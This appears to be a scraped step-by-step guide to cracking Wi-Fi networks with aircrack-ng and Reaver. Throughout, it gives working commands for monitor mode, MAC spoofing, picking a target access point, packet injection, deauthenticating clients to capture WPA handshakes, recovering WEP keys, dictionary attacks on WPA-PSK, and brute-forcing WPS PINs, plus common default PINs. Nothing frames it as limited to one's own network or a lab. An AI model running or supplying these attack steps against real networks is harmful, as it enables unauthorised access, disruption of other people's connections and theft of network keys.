yum search aircrack-ng
yum install aircrack-ng
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
iwconfig (to find all wireless network interfaces and their status)
airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)
ifconfig (to list available network interfaces, my network card is listed as wlan0)
ifconfig wlan0 down (to stop the specified network card)
ifconfig wlan0 hw ether 00:11:22:33:44:55 (change the MAC address of a NIC - can even simulate the MAC of an associated client. NIC should be stopped before chaning MAC address)
iwconfig wlan0 mode monitor (to set the network card in monitor mode)
ifconfig wlan0 up (to start the network card)
iwconfig - similar to ifconfig, but dedicated to the wireless interfaces.
airodump-ng mon0 - monitors all channels, listing available access points and associated clients within range. It is best to select a target network with strong signal (PWR column), more traffic (Beacons/Data columns) and associated clients (listed below all access points). Once you've selected a target, note its Channel and BSSID (MAC address). Also note any STATION associated with the same BSSID (client MAC addresses).
running airodump-ng displays all wireless access points and associated clients in range, as well as MAC addresses, SSIDs, signal levels and other information about them.
airodump-ng -c 6 bssid 00:0F:CC:7D:5A:74 -w data mon0 (-c6 switch would capture data on channel 6, bssid 00:0F:CC:7D:5A:74 is the MAC address of our target access point, -w data specifies that we want to save captured packets into a file called "data" in the current directory, mon0 is our wireless network adapter)
Running airodump-ng on a single channel targeting a specific access point
You typically need between 20,000 and 40,000 data packets to successfully recover a WEP key.
One can also use the "--ivs" switch with the airodump-ng command to capture only IVs, instead of whole packets, reducing the required disk space. However, this switch can only be used if targeting a WEP network, and renders some types of attacks useless.
aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0
-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface
aireplay-ng allows for injecting packets to greatly reduce the time required to recover a WEP key
To test whether your nic is able to inject packets, you may want to try: aireplay-ng -9 wlan0. You may also want to read the information available -here-.
To see all available replay attacks, type just: aireplay-ng
aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory)
aircrack-ng can successfully recover a WEP key with 10-40k captured packets. The retreived key is in hexadecimal, and can be entered directly into a wireless client omitting the ":" separators
If your data file contains ivs/packets from different access points, you may be presented with a list to choose which one to recover.
Usually, between 20k and 40k packets are needed to successfully crack a WEP key. It may sometimes work with as few as 10,000 packets with short keys.
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_IP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, mon0 is your wireless NIC).
The command output looks something like:
12:34:56 Waiting for beakon frame (BSSID: 00:11:22:33:44:55:66) on channel 6
12:34:56 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55:66] [ 5:62 ACKs]
aircrack-ng -w wordlist capture_file (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)
Cracking WPA-PSK and WPA2-PSK only needs 4 packets of data from the network (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files. A good size wordlist should be 20+ Megabytes in size, cracking a strong passphrase will take hours and is CPU intensive.
1. Install Reaver - http://code.google.com/p/reaver-wps/
2. Set your network adapter in monitor mode as described above, using:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 upAlternatively, you can put your network card in monitor mode using: airmon-ng start wlan0 (this will produce an alternate adapter name for the virtual monitor mode adapter, usually mon0 )3. Before using Reaver to initiate a brute-force WPS attack, you may want to check which access points in the area have WPS enabled and are vulnerable to the attack. You can identify them using the "wash" Reaver command as follows:wash -i mon0 --ignore-fcs4. Run Reaver (it only requires two inputs: the interface to use, and the MAC address of the target)There are a number of other parameters that one can explore to further tweak the attack that are usually not required, such as changing the delay between PIN attempts, setting the tool to pause when the access point stops responding, responding to the access point to clear out failed attempts, etc. The above example adds "-vv" to turn on full verbose mode, you can use "-v" instead for fewer messages. Reaver has a number of other switches (check with --help), for example " -c11" will manually set it to use only channel 11, " --no-nacks" may help with some APs.reaver -i mon0 -b 00:01:02:03:04:05 -vv
5. Spoof client MAC address if needed. In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, however, for it to work you will have to change the MAC address of your card's physical interface (wlan0) first, before you specify the reaver option to the virtual monitor interface (usually mon0). To spoof the MAC address:
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b .... -vv --mac=00:11:22:33:44:55
Some routers (including most popular Cisco/Linksys models) will NOT turn off WPS even if turned off via the radio button in their web admin interface. You may be able to turn it off using third-party firmware, such as DD-WRT (wich does not support WPS).
Reportedly, some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
Reaver comilation requires libpcap (pcap-devel) and sq3-devel (sqlite3-dev) installed, or you will get a "pcap library not found" error.
2. Does the adapter driver support injection (is aireplay-ng working) ?
3. Do you have to spoof your MAC address (if AP limits MACs, change both physical and virtual monitor interface) ?
4. Do you have a good signal to the AP ?
5. Do you see associated clients (for WPA handshake capture) ?
6. Do you see WPS pin count incrementing (Reaver WPA cracking) ?
7. Does the target AP support WPS and is it enabled (for WPS attacks, check with the "wash" command) ?